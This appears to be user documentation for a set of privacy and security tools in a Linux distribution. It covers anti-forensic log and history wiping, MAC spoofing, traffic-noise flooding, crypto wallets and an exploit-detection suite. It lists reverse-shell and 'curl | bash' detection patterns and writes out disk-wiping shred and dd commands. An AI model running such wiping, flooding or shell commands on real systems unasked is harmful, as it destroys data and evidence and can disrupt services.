Anti-Forensic Settings Manager is a tool that manages automatic cleanup services during system shutdown. It securely cleans logs, swap, and temporary files for privacy and anti-forensic purposes.

Features

Cleanup Services

• cyrethium-cleanup-logs: Securely deletes system logs
• cyrethium-cleanup-swap: Overwrites swap memory with random data
• cyrethium-cleanup-temp: Cleans temporary files and caches

Management Features

• Enable/disable all services
• Individual service management
• Service status display
• Detailed service information

Usage

anti-forensic

Note: Run as normal user, sudo will be used when needed.

Main Menu

1. Enable All Services

Enables all cleanup services.

Enabled Services: cyrethium-cleanup-logs, cyrethium-cleanup-swap, cyrethium-cleanup-temp

2. Disable All Services

Disables all cleanup services.

3. Manage Individual Services

Manage services individually. View status, disable active service, or enable disabled service.

4. Show Service Information

Shows detailed information about each service.

Service Details

cyrethium-cleanup-logs

Description: Securely deletes system logs

Cleaned Files: /var/log/*, /var/log/auth.log, /var/log/syslog, ~/.bash_history, ~/.local/share/recently-used.xbel

Features: Secure deletion (shred), cleans user bash histories, deletes recently used file lists

cyrethium-cleanup-swap

Description: Overwrites swap memory with random data

Process: Detects swap areas → Disables swap → Overwrites with random data → Re-enables swap

Features: Prevents recovery of sensitive data from swap, minimal shutdown time impact, secure data destruction

cyrethium-cleanup-temp

Description: Cleans temporary files and caches

Cleaned Areas: /tmp/*, /var/tmp/*, ~/.cache/*, ~/.thumbnails/*, Browser data (Firefox, Chrome, Brave)

Features: Removes user activity traces, cleans browser caches, deletes thumbnail caches

Usage Examples

# Example 1: Enable All Services
1. Start anti-forensic
2. Select "1" (Enable all services)
3. All services enabled

# Example 2: Log Cleanup Only
1. Start anti-forensic
2. Select "3" (Manage individual services)
3. Select "1" (cyrethium-cleanup-logs)
4. Confirm with "y"

# Example 3: Check Service Status
Service statuses shown in main menu:
- Active & Enabled (Green)
- Enabled (Inactive) (Yellow)
- Disabled (Red)

Performance Impact

Shutdown Time: Normal ~5s, With Services ~10-20s

Time Distribution: Log cleanup 2-5s, Swap cleanup 3-10s, Temp cleanup 2-5s

Disk Usage: Logs 100MB-1GB, Temp 500MB-5GB, Swap data recovery prevented

Troubleshooting

Service Cannot Be Enabled: Run sudo systemctl daemon-reload and try again, or start services manually

Shutdown Takes Too Long: Disable swap cleanup, it's the longest running process

FAQ

Q: When do services run? A: Automatically during system shutdown.

Q: What if I cancel shutdown? A: Services won't run, data won't be cleaned.

Q: Should I enable all? A: Yes if privacy is priority, be selective if performance matters.

Q: Can data be recovered? A: No, shred and random data writing make recovery impossible.

Q: Works on SSD? A: Yes, but not 100% guaranteed due to wear leveling.

Q: Fast shutdown mode? A: No, all processes must complete for security.

Recommendations: Privacy critical = All services, Performance important = Only logs and temp, No swap usage = Disable swap cleanup

Security Notes

Important Warnings:

1. Data Loss: Cleaned data cannot be recovered
2. Log Analysis: System logs deleted, troubleshooting may be harder
3. Forensic Analysis: Anti-forensic purpose, legal responsibility is yours

Change-MAC is a tool designed to change and restore MAC addresses of network interfaces. It provides secure and easy MAC address management using macchanger.

Usage

sudo change-mac

Note: Root privileges required.

Main Menu

1. Change MAC Address

Changes MAC address.

Steps: Select network interface → Select change type (Random MAC, Random Keep Vendor, Custom MAC) → Change is applied

2. Revert MAC Address

Restores MAC address to original. Requires backup file and interface must have been changed before.

3. Show Current Status

Shows status of all network interfaces: Interface name, Current MAC, Original MAC, Status (UP/DOWN)

4. Exit

Exits the program.

MAC Changing Types

1. Random MAC Address: Creates a completely random MAC address

2. Random MAC (Keep Vendor): Creates random MAC while keeping vendor part

3. Custom MAC Address: User-defined MAC address

MAC Address Format

OUI (First 3 Bytes): Identifies manufacturer, assigned by IEEE. Example: 00:11:22 = Cisco

Device ID (Last 3 Bytes): Device specific, assigned by manufacturer

Backup File: /var/lib/change-mac/original_macs.conf

Usage Examples

# Example 1: WiFi Card MAC Change
1. sudo change-mac
2. Select "1" (Change MAC Address)
3. Select wlan0
4. Select "1" (Random MAC)
5. MAC changed!

# Example 2: Ethernet MAC Restore
1. sudo change-mac
2. Select "2" (Revert MAC Address)
3. Select eth0
4. Original MAC restored!

# Example 3: Custom MAC Address
1. sudo change-mac
2. Select "1"
3. Select interface
4. Select "3" (Custom MAC)
5. Enter MAC: 00:AA:BB:CC:DD:EE
6. Custom MAC applied!

# Example 4: Status Check
sudo change-mac > 3 (Show Current Status)
Interface: eth0
Current MAC: A8:7B:3C:9D:E2:F1
Original MAC: 00:11:22:33:44:55
Status: UP

Security and Privacy

Why Change MAC?

1. Privacy: MAC address can identify you, prevents network tracking, provides location privacy

2. Security: MAC filtering bypass, protection from network attacks, testing and penetration testing

3. Anonymous Connection: Public WiFi usage, connecting to different networks, identity concealment

Best Practices

# 1. Regular Changes - On every network change
sudo change-mac > Random MAC

# 2. Vendor Protection - For compatibility
sudo change-mac > Random (Keep Vendor)

# 3. Backup - Note original MAC
ip link show eth0
# or
macchanger -s eth0

Troubleshooting

Macchanger Not Installed

sudo apt install macchanger

Interface Cannot Be Brought Down

sudo systemctl stop NetworkManager
sudo change-mac
sudo systemctl start NetworkManager

MAC Not Changing

sudo ip link set eth0 down
sudo change-mac
sudo ip link set eth0 up

No Backup File

sudo mkdir -p /var/lib/change-mac
echo "eth0:$(ip link show eth0 | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' | head -1)" | sudo tee -a /var/lib/change-mac/original_macs.conf

Network Connection Lost

sudo systemctl restart NetworkManager
sudo dhclient -r
sudo dhclient

FAQ

Q: Is MAC change permanent? A: No, original MAC returns after system reboot.

Q: Works on all network cards? A: Works on most, but some hardware doesn't support MAC changes.

Q: Why is vendor part important? A: Some networks only allow devices from specific manufacturers.

Q: Random MAC different each time? A: Yes, new random MAC generated each run.

Q: How to learn original MAC? A: From backup file or hardware label.

Q: Can change multiple interfaces? A: Yes, each interface separately.

Security Notes

Important Warnings:

1. Network Rules: Some networks can detect MAC changes
2. Legal Responsibility: Misuse is illegal
3. Connection Loss: Connection drops during change

Tips: Note original MAC, change when no network traffic

ChangeHostname is an interactive tool designed to change and manage system hostname. It offers manual and automatic hostname generation options.

Usage

sudo changehostname

Note: Root privileges required.

Main Menu

1. Change Hostname Manually

Enter hostname manually.

Rules: Must start and end with alphanumeric character, can have hyphens (-) in middle, maximum 63 characters, no spaces or special characters

2. Generate Random Hostname

Generates random hostname.

Options:

• Animal-based (ex: dark-wolf-042)
• Tech-themed (ex: cyber-node-15)
• Game-themed (ex: aatrox-diablo-37)
• Anime-themed (ex: zaraki-kenpachi-042)
• Pure Random (ex: host-a7b9c3d2)
• Codename Style (ex: ghost-black-07)
• Generate Multiple Options

3. Show Current Hostname Info

Shows current hostname information: Hostname, FQDN (Fully Qualified Domain Name), Domain, IP Address

4. Create Hostname Backup

Backs up current hostname. Backup Location: /etc/hostname.backup

5. Restore Hostname from Backup

Restores hostname from backup.

6. Hostname History

Shows hostname change history. Log File: /var/log/hostname.log

Troubleshooting

Hostname Not Changing

# Reload systemd
sudo systemctl daemon-reload

# Check hostname manually
hostname
cat /etc/hostname

/etc/hosts Error

# Manually edit /etc/hosts
sudo nano /etc/hosts

# Find old hostname and change
127.0.1.1    old-hostname
# Change to:
127.0.1.1    new-hostname

Invalid Hostname

Valid formats: my-server, web01, database-prod

Invalid formats: -server (starts with hyphen), my_server (underscore), server- (ends with hyphen), my server (space)

No Backup File

# Create manual backup
sudo cp /etc/hostname /etc/hostname.backup

FAQ

Q: Is hostname change permanent? A: Yes, persists after system reboot.

Q: Reboot required? A: No, but some applications should be restarted. A general reboot is healthier.

Q: What is FQDN? A: Fully Qualified Domain Name (e.g., server.example.com)

Q: Maximum hostname length? A: 63 characters.

Q: How to view hostname history? A: Use menu option "6" or check /var/log/hostname.log

Q: Can use multiple hostnames? A: No, only one hostname can be active at a time.

Security and Privacy

Why Change Hostname?

1. Privacy: Default hostnames can cause information leakage, random hostnames make tracking harder

2. Security: Predictable hostnames can be targets, random names mislead attackers

Security Notes

Important: Hostname visible on network, should not contain sensitive information, regular changes increase privacy

Chaosec is a security tool designed to protect against MITM (Man-in-the-Middle) attacks and traffic analysis. It creates fake traffic to hide your real traffic and makes traffic analysis difficult.

IMPORTANT ETHICAL WARNING

This Tool is a SECURITY TOOL

Chaosec is designed to protect against MITM attacks and traffic analysis.

LONG-TERM USAGE WARNING

• Long-term use may be detected as DoS/DDoS attack activity
• Your IP address may be blocked or blacklisted
• Your ISP may suspend your account
• Legal investigation may be initiated
• You may encounter CAPTCHA or rate limiting from websites

AUTHORIZED USES

• Legitimate privacy protection
• Authorized security research
• Network testing on your own infrastructure
• Learning in controlled training environments

PROHIBITED USES

• DoS/DDoS attacks
• Overwhelming third-party services
• Bypassing legal restrictions
• Malicious or illegal activities

AUTOMATIC STOP

This tool runs for a maximum of 5 minutes and stops automatically. This duration is limited for security reasons.

By using this tool, you accept all responsibility. Authors are not responsible for misuse or resulting damages.

Features

Traffic Obfuscation Techniques

• DNS Noise: Creates random DNS queries
• HTTP Traffic: Legitimate-looking HTTP requests
• TCP Connections: Random TCP connections
• UDP Packets: Random UDP packets

Traffic Patterns

• Browsing: Normal web browsing pattern
• Streaming: Video/audio streaming pattern
• Gaming: Online gaming traffic pattern
• Chaotic: Maximum chaos mode - all traffic types
• Stealth: Low-profile stealth mode
• Research: Academic/research browsing pattern
• Social: Social media usage pattern

Configuration

• Customizable intensity (0.1-10.0x)
• Tor network optimization
• Custom domain addition
• Statistics tracking
• Automatic security limits

How It Works

Traffic Obfuscation Mechanism: Chaosec creates fake traffic to hide your real traffic:

1. Real Traffic + Fake Traffic = Analysis Difficulty
2. Attackers cannot distinguish which traffic is real
3. Traffic analysis becomes difficult
4. MITM attacks become ineffective

Example Scenario

Attacker monitoring your traffic:

real: youtube.com (Your real activity)
Fake: wikipedia.org (Chaosec)
Fake: github.com (Chaosec)
Fake: mozilla.org (Chaosec)
real: email.com (Your real activity)
Fake: python.org (Chaosec)
Fake: debian.org (Chaosec)

Attacker cannot tell which traffic is real!

Usage

Basic Usage

# DNS and HTTP noise
chaosec --dns-noise --http-flood

# All traffic types
chaosec --all-noise

# With specific pattern
chaosec --all-noise --pattern browsing

# High intensity
chaosec --all-noise --intensity 2.0

Traffic Patterns

# Normal web browsing
chaosec --all-noise --pattern browsing

# Video streaming
chaosec --all-noise --pattern streaming

# Online gaming
chaosec --all-noise --pattern gaming

# Maximum chaos
chaosec --all-noise --pattern chaotic

# Stealth mode
chaosec --all-noise --pattern stealth

# Research
chaosec --all-noise --pattern research

# Social media
chaosec --all-noise --pattern social

Tor Mode

# Optimized for Tor network
chaosec --all-noise --tor-mode --pattern browsing

In Tor mode: Minimum wait time 1 second, Tor-appropriate traffic patterns, less aggressive requests

Intensity Setting

# Low intensity (0.5x)
chaosec --all-noise --intensity 0.5

# Normal intensity (1.0x - default)
chaosec --all-noise --intensity 1.0

# High intensity (2.0x)
chaosec --all-noise --intensity 2.0

# Maximum intensity (10.0x)
chaosec --all-noise --intensity 10.0

Command Line Options

Traffic Generators

• --dns-noise: Create random DNS queries
• --http-flood: Create random HTTP requests
• --tcp-noise: Create random TCP connections
• --udp-noise: Create random UDP packets
• --all-noise: Enable all traffic generators

Configuration

• --intensity FLOAT: Traffic intensity multiplier (0.1-10.0)
• --tor-mode: Optimize for Tor network
• --duration INT: Run duration (minutes, max 5)
• --verbose, -v: Verbose output and statistics

Traffic Pattern Details

1. Browsing (Web Browsing)

Description: Simulates normal web browsing behavior

Features: HTTP 60%, DNS 30%, TCP 10%, UDP 5%, Interval 1-8 seconds

Use Case: Hide daily web browsing activities

2. Streaming

Description: Simulates video/audio streaming traffic

Features: HTTP 80%, DNS 10%, TCP 5%, UDP 20%, Interval 0.5-2 seconds

Use Case: Hide video watching or music listening activities

3. Gaming

Description: Simulates online gaming traffic

Features: HTTP 20%, DNS 10%, TCP 30%, UDP 50%, Interval 0.1-1 second

Use Case: Hide online gaming activities

4. Chaotic

Description: Maximum chaos mode - all traffic types

Features: HTTP 100%, DNS 100%, TCP 100%, UDP 100%, Interval 0.1-0.5 seconds

Use Case: Maximum privacy, traffic analysis completely difficult

WARNING: Most aggressive mode, use carefully!

5. Stealth

Description: Low-profile stealth mode

Features: HTTP 40%, DNS 20%, TCP 5%, UDP 2%, Interval 5-30 seconds

Use Case: Provide privacy without being noticed

Troubleshooting

Program Stops Immediately

Problem: Program stops right after starting

Solution: Select at least one traffic generator: chaosec --dns-noise --http-flood or chaosec --all-noise

Connection Errors

Problem: "Connection refused" or "Timeout" errors

Solution: This is normal. Some servers may refuse connections. Program continues automatically. Don't worry.

High CPU Usage

Problem: CPU usage too high

Solution: Reduce intensity: chaosec --all-noise --intensity 0.5 or use fewer traffic types

IP Blocked

Problem: Some sites blocked your IP

Solution: This is normal when tool used aggressively. Reduce intensity, use stealth mode, use with Tor

Limitations

• Maximum Runtime: 5 minutes maximum, automatic stop, limited for security
• Intensity Limits: Minimum 0.1x, Maximum 10.0x, Recommended 0.5-2.0x
• Network Bandwidth: Uses bandwidth at high intensity, may consume internet quota, use carefully
• ISP Policies: Some ISPs may block aggressive traffic, may apply rate limiting, may suspend your account

FAQ

Q: Is Chaosec legal? A: Legal to use for your own privacy. But DoS/DDoS attacks are illegal.

Q: Will my ISP notice? A: May notice at high intensity. Use stealth mode and low intensity.

Q: Should I use with Tor? A: Yes, recommended to use with Tor. Use --tor-mode.

Q: How long should I run it? A: Maximum 5 minutes. Shorter durations are safer.

Q: Does it really work? A: Yes, makes traffic analysis difficult. But doesn't provide 100% protection.

Q: Can I use with VPN? A: Yes, VPN + Chaosec is a good combination.

Q: Why 5 minute limit? A: For security. Prevents detection as DoS/DDoS.

Disclaimer

IMPORTANT WARNINGS:

1. This tool is for legitimate privacy protection only
2. DO NOT USE for DoS/DDoS attacks
3. Do not run for long periods (max 5 minutes)
4. Comply with ISP policies
5. Legal responsibility is yours

Authors' Responsibility: Authors not responsible for misuse, user responsible for legal issues, tool provided "AS IS", no warranty given

USE ONLY WHEN NECESSARY! STAY SAFE!

Cyrethium offers various security and utility tools for cryptocurrency transactions.

Address Validator

Validates cryptocurrency addresses and performs format checks.

Supported Coins: Bitcoin (Base58 and Bech32/Bech32m), Ethereum (EIP-55 checksum), Litecoin

address-validator

Features: Bitcoin SegWit (bc1) support, Ethereum EIP-55 checksum validation, Testnet address support, Detailed error messages

Balance Checker

Checks cryptocurrency address balances.

Supported Coins: Bitcoin (BlockCypher API), Ethereum (Etherscan/Public RPC), Litecoin (BlockCypher API)

balance-checker

Ethereum API Sources: Etherscan (ETHERSCAN_API_KEY required), PublicNode RPC, Ankr RPC, Cloudflare RPC

Coin Watch

Tracks cryptocurrency prices and market data.

Features: Live price tracking, Watchlist management, Portfolio tracking, Price alerts, Tor proxy support, Traffic patterns

coin-watch

Configuration: ~/.config/cyrethium-coinwatch/config.json

Privacy Analyzer

Analyzes privacy features of cryptocurrency addresses.

crypto-privacy-analyzer

Analysis Criteria: Address format, Privacy score (0-100), Recommendations, Risk analysis

Key Backup

Securely backs up private keys.

Features: AES-256 encryption, PBKDF2 (100,000 iterations), Backup and restore

key-backup

Paper Wallet

Creates offline cryptocurrency wallets.

Supported Coins: Bitcoin, Ethereum, Litecoin

Features: QR code generation, WIF format, Multiple wallet creation

paper-wallet

Private Key Converter

Converts private key formats.

Supported Formats: HEX, WIF

Features: HEX ↔ WIF conversion, Address generation, Multi-coin support

private-key-converter

Security Notes

Important Warnings:

1. Never Share Private Keys
2. Keep Backups Secure
3. Test on Test Networks
4. Start with Small Amounts

Crypted Notes (Securonis Notes) is a modern note-taking application that allows you to store your notes encrypted. Developed with PyQt5, it offers a user-friendly interface and powerful encryption features.

Usage

crypted-notes

Interface Components

Note Editor

Title: Note title input (required)

Content: Rich text editor with formatted text support, color and font selection

Tags: Comma-separated tags (e.g., work, urgent, meeting)

Priority: Low (default), Medium, High

Category: General (default), Work, Personal, Ideas, Tasks, Custom categories can be added

Deadline: Date and time selection with calendar widget (Format: YYYY-MM-DD HH:MM)

Options

• Encrypt: Encrypt the note
• Favorite: Mark as favorite
• Archive: Archive
• Set Reminder: Set reminder
• Attachments: File attachments

Buttons

Save: Saves the note (checks: title not empty, password if encryption selected, date format validation)

Clear Form: Clears the form (title, content, tags, all options)

Text Color: Changes text color (color picker opens, selected color applied to text)

Text Font: Changes font (font family, size, style: bold, italic)

File Attachments

Supported Formats: Documents (.txt, .pdf, .doc, .docx), Images (.jpg, .jpeg, .png, .gif)

Limitations: Max file size 10MB, Max 10 attachments per note

Adding Files: Check "Attachments" option → File picker opens → Select file → File encoded with Base64 and saved

Encryption

Algorithm: Fernet (AES-256-CBC)

Process: User enters password → Password hashed with PBKDF2 → Note content encrypted with Fernet → Encrypted data saved

Creating Encrypted Note: Check "Encrypt" option → Save note → Enter password (twice) → Note encrypted and saved

Opening Encrypted Note: Select encrypted note → Enter password → Note decrypted and displayed

WARNING: If you forget the password, the note cannot be recovered!

Reminders

Setting Reminder: Check "Set Reminder" option → Select date and time → Save note

Reminder Notification: Notification shown at specified date/time using system notifications with note title and content preview

Search and Filtering

Search Criteria: Title, Content, Tags, Category

Filter Options: All notes, Favorites, Archived, Encrypted notes, By category, By priority

Export

Formats: JSON, CSV, TXT

Keyboard Shortcuts

General: Ctrl+S (Save), Ctrl+N (New note), Ctrl+F (Search), Ctrl+Q (Exit)

Editing: Ctrl+B (Bold), Ctrl+I (Italic), Ctrl+U (Underline), Ctrl+Z (Undo), Ctrl+Y (Redo)

Troubleshooting

Note Cannot Be Saved: Fill in title field, check disk space, check write permissions

Encrypted Note Cannot Be Opened: Make sure password is correct, Caps Lock should be off, if password forgotten note cannot be recovered

File Cannot Be Attached: File size must be less than 10MB, must be supported format, max 10 attachments limit

FAQ

Q: Where are notes stored? A: In ~/.config/crypted-notes/notes.json file.

Q: How secure is encryption? A: Uses AES-256, industry standard.

Q: What if I forget password? A: Note cannot be recovered, lost if no backup.

Q: Are notes synchronized? A: No, stored locally.

Q: Is there a max note count? A: No, depends on disk space.

Anti-Exploit Suite is a comprehensive security tool that protects your system against 10 different exploit and attack types. Each module detects and reports specific attack vectors.

Security Modules

1. Cron Hunter

Purpose: Detects malicious commands in scheduled tasks

How it Works:

• Scans crontab files and systemd timers
• Analyzes threat indicators like reverse shells, network connections, obfuscation
• Calculates threat score (0-100)

2. Ghost Service Killer

Purpose: Finds daemon processes not registered with systemd

How it Works:

• Scans long-running processes (default: 10+ minutes)
• Compares with systemd services
• Analyzes network connections and suspicious behavior

3. Hidden Binary Hunter

Purpose: Detects processes running from deleted binary files

How it Works:

• Searches for "(deleted)" marker in /proc/[pid]/exe
• Checks RWX (read-write-execute) memory regions
• Analyzes long runtime and suspicious parent processes

4. Reverse Shell Detector

Purpose: Detects reverse shell and C2 (Command & Control) connections

How it Works:

• Scans network connections (ESTABLISHED state)
• Searches for reverse shell patterns (bash -i >&, /dev/tcp, nc -e, etc.)
• Flags connections to suspicious ports (4444, 5555, 1337, etc.)

5. Rootshell Injection Mitigator

Purpose: Detects tampering of system binaries and rootkit injection

How it Works:

• Calculates SHA256 hashes of critical shell and system binaries
• Compares with baseline
• Scans binaries for suspicious strings (socket, exec, setuid, etc.)

6. TTY Hijack Detector

Purpose: Monitors TTY sessions and detects hijacking attempts

How it Works:

• Scans active TTY sessions
• Checks for suspicious parent processes
• Detects LD_PRELOAD injections and environment variable manipulation

7. Zombie Hunter

Purpose: Detects and cleans zombie (defunct) processes

How it Works:

• Searches for Z (zombie) state in /proc/[pid]/stat
• Sends SIGCHLD to parent process
• Terminates parent process if unsuccessful

8. Service Registration Mismatch Finder

Purpose: Finds long-running processes not registered with systemd

How it Works:

• Scans processes running 10+ minutes
• Checks systemd cgroups
• Special check for daemon users (www-data, mysql, etc.)

9. Shebang & Script Obfuscation Scanner

Purpose: Detects obfuscated shell scripts

How it Works:

• Scans /usr/local/bin, /opt, cron directories
• Validates shebang
• Searches for obfuscation patterns:
  • Base64 decode & execute (base64 -d | sh)
  • Remote execution (curl | bash)
  • Eval patterns
  • Hex/octal encoding
• Analysis: Entropy calculation, character density, long lines

10. SUID/SGID Anomaly Scanner

Purpose: Detects suspicious SUID/SGID binaries

How it Works:

• Finds SUID/SGID files system-wide
• Checks ownership by querying package manager (dpkg/rpm/pacman)
• Calculates SHA256 hashes
• Analyzes file permissions and ownership

Usage

sudo anti-exploitsuite

Note: Root privileges recommended for full system scan.

Usage Examples

# Full System Scan
sudo anti-exploitsuite
# Run each module in sequence

# Specific Module
sudo anti-exploitsuite
> 4  # Reverse Shell Detector

Troubleshooting

Module Not Found:

# Check module directories
ls -la /opt/anti-exploit/

# Fix permissions
sudo chmod +x /opt/anti-exploit/*

Root Privileges Required:

sudo anti-exploitsuite

Security Notes

Important: False positives may occur - some legitimate applications may be detected. Always verify findings before taking action.

USB Toolkit is a secure erase, format and management tool for USB drives.

Features

• USB device listing
• Secure erase (shred)
• Random data fill
• Format (FAT32, NTFS, EXT4)
• System disk protection

Usage

sudo usbtoolkit

Note: Requires root privileges.

Main Menu (Interactive Mode)

1. List USB devices: Lists USB devices

2. Show device information: Shows device details (size, model, vendor, partitions, filesystem)

3. Secure erase (shred): Secure erase (3 passes) - shred -v -n 3 -z /dev/sdb - WARNING: All data will be deleted!

4. Fill with random data: Random data fill - dd if=/dev/urandom of=/dev/sdb bs=4M

5. Format: Format options - FAT32 (vfat): Windows/Linux compatible, NTFS: Windows, EXT4: Linux

Command Line Usage

# List
sudo usbtoolkit --list

# Info
sudo usbtoolkit --info /dev/sdb

# Secure Erase
sudo usbtoolkit --erase /dev/sdb

# Random Fill
sudo usbtoolkit --random /dev/sdb

# Format
sudo usbtoolkit --format /dev/sdb vfat
sudo usbtoolkit --format /dev/sdb ntfs
sudo usbtoolkit --format /dev/sdb ext4

Security Measures

System Disk Protection: Checks root partition (/), /dev/sda, mount status

Unmount: All partitions unmounted before operation (umount /dev/sdb1, umount /dev/sdb2)

Warnings

Select correct device! Wrong device selection causes data loss.

Don't erase system disk! /dev/sda is usually the system disk.

Backup! Operation is irreversible.

SystemKnight is a malware and rootkit scanning tool that manages ClamAV and rkhunter tools.

Usage

sudo systemknight

Note: Requires root privileges.

Main Menu

1. ClamAV Scan (Malware Detection)

Quick scan (home directory): Scans user directory, fast scan

Full system scan: Scans entire system, excludes /proc, /sys, /dev

Custom directory scan: Scans specified directory

Scan and remove infected files: Scans and removes infected files - WARNING: Irreversible!

2. rkhunter Scan (Rootkit Detection)

Standard system check: Normal rootkit scan

Check with only warnings displayed: Show only warnings

Thorough system check: Detailed scan

3. Update All Definitions

Updates virus and rootkit definitions.

4. System Information

Shows system information: Hostname, Kernel version, Operating system, ClamAV version, rkhunter version

5. Install Dependencies

Installs ClamAV and rkhunter.

SHA256 Checksum is a SHA256 hash calculation and verification tool for verifying file integrity.

Features

• SHA256 checksum calculation
• Checksum verification
• Batch processing
• Verification from checksum file

Usage

sha256checksum

Main Menu

1. Calculate SHA256 checksum

Calculates checksum for single file.

File path: /home/user/file.iso

Output:
File: /home/user/file.iso
SHA256: a1b2c3d4e5f6...

Save checksum to file? [y/N]: y
Checksum saved to: /home/user/file.iso.sha256

2. Verify SHA256 checksum

Verifies file checksum.

File path: /home/user/file.iso
Enter expected SHA256 checksum: a1b2c3d4e5f6...

Output:
File: /home/user/file.iso
Expected: a1b2c3d4e5f6...
Actual:   a1b2c3d4e5f6...

✓ Checksum verified! File integrity confirmed.

3. Batch calculate checksums

Calculates checksums for all files in folder.

Enter directory path: /home/user/downloads
File extension filter: *.iso

Output:
✓ Checksums calculated for 5 files
Results saved to: checksums_20250126_171200.sha256

4. Verify from checksum file

Verifies all checksums from .sha256 file.

Enter checksum file path: checksums.sha256

Output:
file1.iso: OK
file2.iso: OK
file3.iso: FAILED

✗ Issues detected with some files

Cyrethium Jails Manager is an interactive tool designed to run applications in secure sandbox environments using Firejail. You can easily configure security settings with a user-friendly menu system.

Usage

cyrethium-jails

Note: Do not run as root! Works with normal user.

Main Menu

1. Launch Application in Sandbox

Runs an application in sandbox with custom security settings.

Configuration Options: Network access, Home directory isolation, Temporary filesystem, Sound access, 3D acceleration, Webcam access, Read-only filesystem, Seccomp filtering, AppArmor, Custom profile

2. Quick Launch with Presets

Preset 1 - Maximum Security: Strictest security settings for untrusted applications

Preset 2 - Internet Browser: For web browsers (Firefox, Chrome, Brave)

Preset 3 - Office Application: For office apps (LibreOffice, PDF readers)

Preset 4 - Media Player: For media players (VLC, MPV)

Preset 5 - Development Tool: For IDEs and code editors

3. List Active Sandboxes

Lists all running Firejail sandboxes.

4. Kill Sandbox Process

Terminates a specific sandbox process.

5. Show Firejail Profiles

Lists available Firejail profiles. Profile location: /etc/firejail/

6. System Information

Shows system and security features.

Firejail Options Details

--net=none: Blocks all network access

--private: Creates empty temporary home directory

--private-tmp: Creates private /tmp directory

--nosound: Blocks access to sound devices

--no3d: Disables 3D acceleration

--novideo: Blocks webcam access

--seccomp: Filters dangerous system calls

--apparmor: Applies AppArmor confinement

Limitations

1. Root-requiring apps: Firejail cannot run apps requiring root

2. Kernel modules: Access to kernel modules blocked (affects VirtualBox, VMware)

3. Hardware access: Direct hardware access limited (USB devices, special hardware)

4. X11 apps: Some GUI apps may need extra configuration (use --x11 option)

FAQ

Q: Does Cyrethium Jails require root? A: No, works with normal user. Don't run as root!

Q: Difference between Firejail and Plaztek? A: Firejail is more user-friendly and optimized for GUI apps. Plaztek is lighter for scripts.

Q: Do all apps work with Firejail? A: Most work, but some special apps may need extra configuration.

Q: Performance impact? A: Minimal, most users won't notice.

Q: Can escape from sandbox? A: Theoretically not possible, but kernel bugs may pose risk.

Q: Multiple sandboxes simultaneously? A: Yes, run as many as you want.

FastCrypt is a simple and fast file encryption tool based on PyQt5. Securely encrypts your files using Fernet (AES-256) encryption.

Usage

fastcrypt

Main Functions

1. Select File: Select file to encrypt or decrypt

2. Enter Password: Enter password (same password for encryption and decryption)

3. Encrypt: Encrypts file and adds .fcrypt extension (e.g., document.pdf → document.pdf.fcrypt)

4. Decrypt: Decrypts .fcrypt file to original (e.g., document.pdf.fcrypt → document.pdf)

Security Notes

Important: Don't forget password (no recovery), use strong password, securely delete original file

MetadataCleaner is a PyQt5-based tool that removes EXIF and metadata information from image files. Removes metadata for privacy.

Usage

metadatacleaner

Main Functions

1. Select Path: Select file or folder (File: single file, Folder: folder scan)

2. Scan Subfolders: Scan subfolders too

3. Clean Metadata: Clean metadata (Process: File backed up → Metadata removed → File verified → Restore from backup if failed)

Supported Formats

.png, .jpg, .jpeg, .tiff, .bmp, .gif, .webp, .tif, .ico, .svg, .heic, .heif, .raw, .cr2, .nef, .arw, .dng, .psd, .ai, .eps

Important

Original files backed up, restore on failed operation, max file size: 100MB

Network Stats is a simple bash tool that displays network configuration and fixes issues.

Usage

sudo network-stats

Main Menu

1. Show Network Interfaces: Shows active network interfaces

2. Show Routing Information: Shows routing table

3. Show DNS Configuration: Shows DNS servers

4. Show Active Connections: Shows listening services

5. Run Connectivity Test: Tests internet connection

6. Show All Network Info: Shows all information

7. Fix Network & Reset IPTables: Resets network and firewall - WARNING: All iptables rules will be deleted!

Important

Network fixer requires root, don't use when Tor is active, all firewall rules will be deleted

NodeChecker is a PyQt5-based tool that visually monitors circuits and streams in the Tor network. Forked from Tails' "Onion Circuits" tool.

Usage

sudo nodechecker

Note: Tor must be running.

Interface

Left Panel: Shows Circuit/Stream list

Right Panel: Shows Node details

I2P Router Menu is a PyQt5-based interface for managing the I2P (Invisible Internet Project) network. I2P is an anonymous communication network alternative to Tor.

What is I2P?

Basic Concept: I2P is a peer-to-peer based anonymous network. Unlike Tor, not just exit traffic, but all communication stays within the I2P network.

Tor vs I2P

Purpose: Tor - Anonymous access to clearnet | I2P - P2P anonymous network

Structure: Tor - Circuit-based | I2P - Packet-switched

Speed: Tor - Medium | I2P - Faster (for P2P)

Usage: Tor - Web browsing | I2P - File sharing, messaging

How I2P Works

1. Garlic Routing: Uses "garlic routing" instead of Tor's "onion routing" - Multiple messages in one packet, more efficient, traffic analysis harder

2. Tunnels: Each user creates 2 types of tunnels - Inbound (Internet → Peer 1 → Peer 2 → Peer 3 → YOU) and Outbound (YOU → Peer A → Peer B → Peer C → Target). Each tunnel changes every 10 minutes, minimum 3 hops, 2 separate tunnels for bidirectional communication

3. NetDB (Network Database): No central server in I2P. Uses Distributed Hash Table (DHT) - Peer addresses, tunnel info, encryption keys

4. Eepsite (.i2p): I2P's own websites - example.i2p accessible within I2P, not accessible from clearnet

Usage

i2p-routermenu

Main Menu

1. Start I2P Router: Starts I2P router and opens console in browser (http://127.0.0.1:7657/)

2. Stop I2P Router: Stops I2P

3. Graceful Stop: Gracefully stops I2P (may take up to 11 minutes) - Active tunnels closed, connections cleanly terminated, data loss prevented

4. Restart I2P Router: Restarts I2P

5. Check I2P Status: Checks if I2P is running

6. Install I2P (Auto-Start): Auto-starts I2P at system boot

7. Remove I2P (Disable Auto-Start): Disables auto-start

8. View Thread Dump: Shows Java thread dump (for debugging)

Important

1. First Start: Wait 10-15 minutes (network integration)

2. Clearnet: I2P not optimized for clearnet exit like Tor

Tips

1. Bandwidth: More bandwidth = Better performance

2. Uptime: Keep open longer (contributes to network)

Monerothium is an interactive tool designed to manage Monero (XMR) wallet operations. Enables secure Monero transactions over Tor network.

Usage

monerothium

First Run: Tor connection checked when program starts - WARNING: Risky to continue without Tor connection!

Wallet Management

1. Create New Wallet: Creates new Monero wallet (Enter wallet name → Select network → Set strong password → Save seed phrase 25 words) - IMPORTANT: Keep seed phrase safe!

2. Open Existing Wallet: Opens previously created wallet

3. Restore Wallet from Seed: Restores wallet with 25-word seed phrase

Wallet Operations

4. Show Wallet Info: Shows detailed wallet info (Primary address, Seed phrase, View key, Spend key)

